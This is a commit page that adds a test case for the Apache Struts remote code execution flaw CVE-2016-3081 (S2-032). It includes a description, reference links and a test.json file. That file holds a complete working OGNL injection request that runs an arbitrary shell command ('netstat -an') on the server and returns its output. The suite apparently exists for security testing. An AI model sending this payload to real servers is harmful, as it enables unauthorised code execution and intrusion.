add CVE-2016-3081

foospidy · Dec 27, 2018 · 3af98ac · 3af98ac
1 parent 7ba5e6c
commit 3af98ac
Show file tree

Hide file tree

Showing 3 changed files with 15 additions and 0 deletions.
diff --git a/tests/CVE-2016-3081/description.txt b/tests/CVE-2016-3081/description.txt
@@ -0,0 +1,4 @@
+Apache Struts 2.x before 2.3.20.2, 2.3.24.x before 2.3.24.2, and 2.3.28.x
+before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote
+attackers to execute arbitrary code via method: prefix, related to chained
+expressions.
diff --git a/tests/CVE-2016-3081/reference.txt b/tests/CVE-2016-3081/reference.txt
@@ -0,0 +1,2 @@
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3081
+https://cwiki.apache.org/confluence/display/WW/S2-032
diff --git a/tests/CVE-2016-3081/test.json b/tests/CVE-2016-3081/test.json
@@ -0,0 +1,9 @@
+[
+    {
+        "Method": "GET",
+        "URI": "/some.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=netstat -an&pp=____A&ppp=%20&encoding=UTF-8",
+        "Headers": {
+            "User-Agent": "Mozilla/5.0"
+        }
+    }
+]